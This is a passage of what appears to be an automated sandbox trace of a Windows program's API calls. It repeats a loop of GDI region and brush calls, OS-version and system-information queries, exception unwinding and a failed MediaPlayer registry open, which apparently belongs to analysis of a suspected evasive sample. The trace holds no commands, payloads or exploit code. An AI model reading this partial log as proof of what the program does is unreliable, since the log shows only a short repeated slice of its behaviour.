hrgnSrc1=0x980401d9, hrgnSrc2=0x960401dc, iMode=1) returned 1 [0090.916] CombineRgn (hrgnDst=0x10459ac, hrgnSrc1=0x980401d9, hrgnSrc2=0x960401dc, iMode=4) returned 2 [0090.916] CreateSolidBrush (color=0xff) returned 0x21059aa [0090.916] CreateSolidBrush (color=0xff0000) returned 0x11059ad [0090.916] DeleteObject (ho=0x11059ad) returned 1 [0090.916] DeleteObject (ho=0x960401dc) returned 1 [0090.916] DeleteObject (ho=0x980401d9) returned 1 [0090.916] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.916] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.916] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.916] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.916] BeginPath (hdc=0x0) returned 0 [0090.916] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.916] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.916] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.917] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.917] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401dc [0090.917] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401d9 [0090.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ae [0090.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459af [0090.917] CombineRgn (hrgnDst=0x10459ae, hrgnSrc1=0x970401dc, hrgnSrc2=0x990401d9, iMode=1) returned 1 [0090.917] CombineRgn (hrgnDst=0x10459af, hrgnSrc1=0x970401dc, hrgnSrc2=0x990401d9, iMode=4) returned 2 [0090.917] CreateSolidBrush (color=0xff) returned 0x21059ad [0090.917] CreateSolidBrush (color=0xff0000) returned 0x11059b0 [0090.917] DeleteObject (ho=0x11059b0) returned 1 [0090.917] DeleteObject (ho=0x990401d9) returned 1 [0090.917] DeleteObject (ho=0x970401dc) returned 1 [0090.917] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.917] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.917] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.917] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.917] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.917] BeginPath (hdc=0x0) returned 0 [0090.917] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.917] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.917] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.917] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.917] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.917] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401d9 [0090.917] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401dc [0090.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b1 [0090.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b2 [0090.917] CombineRgn (hrgnDst=0x10459b1, hrgnSrc1=0x9a0401d9, hrgnSrc2=0x980401dc, iMode=1) returned 1 [0090.918] CombineRgn (hrgnDst=0x10459b2, hrgnSrc1=0x9a0401d9, hrgnSrc2=0x980401dc, iMode=4) returned 2 [0090.918] CreateSolidBrush (color=0xff) returned 0x21059b0 [0090.918] CreateSolidBrush (color=0xff0000) returned 0x11059b3 [0090.918] DeleteObject (ho=0x11059b3) returned 1 [0090.918] DeleteObject (ho=0x980401dc) returned 1 [0090.918] DeleteObject (ho=0x9a0401d9) returned 1 [0090.918] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.918] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.918] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.918] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.918] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.918] BeginPath (hdc=0x0) returned 0 [0090.918] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.918] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.918] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.918] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.918] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.918] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.918] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.918] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401dc [0090.918] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401d9 [0090.918] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b4 [0090.918] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b5 [0090.918] CombineRgn (hrgnDst=0x10459b4, hrgnSrc1=0x990401dc, hrgnSrc2=0x9b0401d9, iMode=1) returned 1 [0090.918] CombineRgn (hrgnDst=0x10459b5, hrgnSrc1=0x990401dc, hrgnSrc2=0x9b0401d9, iMode=4) returned 2 [0090.918] CreateSolidBrush (color=0xff) returned 0x21059b3 [0090.918] CreateSolidBrush (color=0xff0000) returned 0x11059b6 [0090.918] DeleteObject (ho=0x11059b6) returned 1 [0090.918] DeleteObject (ho=0x9b0401d9) returned 1 [0090.918] DeleteObject (ho=0x990401dc) returned 1 [0090.918] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.918] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.918] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.918] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.918] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.918] BeginPath (hdc=0x0) returned 0 [0090.918] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.919] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.919] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.919] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.919] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.919] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.919] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.919] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401d9 [0090.919] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401dc [0090.919] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b7 [0090.919] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459b8 [0090.919] CombineRgn (hrgnDst=0x10459b7, hrgnSrc1=0x9c0401d9, hrgnSrc2=0x9a0401dc, iMode=1) returned 1 [0090.919] CombineRgn (hrgnDst=0x10459b8, hrgnSrc1=0x9c0401d9, hrgnSrc2=0x9a0401dc, iMode=4) returned 2 [0090.919] CreateSolidBrush (color=0xff) returned 0x21059b6 [0090.919] CreateSolidBrush (color=0xff0000) returned 0x11059b9 [0090.919] DeleteObject (ho=0x11059b9) returned 1 [0090.919] DeleteObject (ho=0x9a0401dc) returned 1 [0090.919] DeleteObject (ho=0x9c0401d9) returned 1 [0090.919] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.919] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.919] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.919] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.919] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.919] BeginPath (hdc=0x0) returned 0 [0090.919] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.919] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.919] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.919] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.919] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.919] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.919] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.920] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401dc [0090.920] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401d9 [0090.920] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ba [0090.920] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459bb [0090.920] CombineRgn (hrgnDst=0x10459ba, hrgnSrc1=0x9b0401dc, hrgnSrc2=0x9d0401d9, iMode=1) returned 1 [0090.920] CombineRgn (hrgnDst=0x10459bb, hrgnSrc1=0x9b0401dc, hrgnSrc2=0x9d0401d9, iMode=4) returned 2 [0090.920] CreateSolidBrush (color=0xff) returned 0x21059b9 [0090.920] CreateSolidBrush (color=0xff0000) returned 0x11059bc [0090.920] DeleteObject (ho=0x11059bc) returned 1 [0090.920] DeleteObject (ho=0x9d0401d9) returned 1 [0090.920] DeleteObject (ho=0x9b0401dc) returned 1 [0090.920] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.920] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.920] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.920] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.920] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.920] BeginPath (hdc=0x0) returned 0 [0090.920] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.920] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.920] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.920] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.920] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.920] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.920] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.920] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.920] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401d9 [0090.920] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401dc [0090.920] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459bd [0090.920] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459be [0090.920] CombineRgn (hrgnDst=0x10459bd, hrgnSrc1=0x9e0401d9, hrgnSrc2=0x9c0401dc, iMode=1) returned 1 [0090.920] CombineRgn (hrgnDst=0x10459be, hrgnSrc1=0x9e0401d9, hrgnSrc2=0x9c0401dc, iMode=4) returned 2 [0090.920] CreateSolidBrush (color=0xff) returned 0x21059bc [0090.920] CreateSolidBrush (color=0xff0000) returned 0x11059bf [0090.920] DeleteObject (ho=0x11059bf) returned 1 [0090.920] DeleteObject (ho=0x9c0401dc) returned 1 [0090.920] DeleteObject (ho=0x9e0401d9) returned 1 [0090.920] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.920] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.921] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.921] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.921] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.921] BeginPath (hdc=0x0) returned 0 [0090.921] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.921] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.921] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.921] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.921] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.921] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.921] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.921] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.921] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401dc [0090.921] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401d9 [0090.921] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c0 [0090.921] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c1 [0090.921] CombineRgn (hrgnDst=0x10459c0, hrgnSrc1=0x9d0401dc, hrgnSrc2=0x9f0401d9, iMode=1) returned 1 [0090.921] CombineRgn (hrgnDst=0x10459c1, hrgnSrc1=0x9d0401dc, hrgnSrc2=0x9f0401d9, iMode=4) returned 2 [0090.921] CreateSolidBrush (color=0xff) returned 0x21059bf [0090.921] CreateSolidBrush (color=0xff0000) returned 0x11059c2 [0090.921] DeleteObject (ho=0x11059c2) returned 1 [0090.921] DeleteObject (ho=0x9f0401d9) returned 1 [0090.921] DeleteObject (ho=0x9d0401dc) returned 1 [0090.921] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.921] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.921] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.921] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.921] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.921] BeginPath (hdc=0x0) returned 0 [0090.921] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.921] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.921] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.921] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.921] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.921] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.922] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.922] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.922] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401d9 [0090.922] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401dc [0090.922] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c3 [0090.922] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c4 [0090.922] CombineRgn (hrgnDst=0x10459c3, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=1) returned 1 [0090.922] CombineRgn (hrgnDst=0x10459c4, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=4) returned 2 [0090.922] CreateSolidBrush (color=0xff) returned 0x21059c2 [0090.922] CreateSolidBrush (color=0xff0000) returned 0x11059c5 [0090.922] DeleteObject (ho=0x11059c5) returned 1 [0090.922] DeleteObject (ho=0x9e0401dc) returned 1 [0090.922] DeleteObject (ho=0xa00401d9) returned 1 [0090.922] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.922] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.922] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.922] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.922] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.922] BeginPath (hdc=0x0) returned 0 [0090.922] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.922] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.922] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.922] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.922] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.922] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.922] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.922] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.922] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401dc [0090.922] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401d9 [0090.922] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c6 [0090.922] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c7 [0090.922] CombineRgn (hrgnDst=0x10459c6, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=1) returned 1 [0090.922] CombineRgn (hrgnDst=0x10459c7, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=4) returned 2 [0090.923] CreateSolidBrush (color=0xff) returned 0x21059c5 [0090.923] CreateSolidBrush (color=0xff0000) returned 0x11059c8 [0090.923] DeleteObject (ho=0x11059c8) returned 1 [0090.923] DeleteObject (ho=0xa10401d9) returned 1 [0090.923] DeleteObject (ho=0x9f0401dc) returned 1 [0090.923] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.923] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: 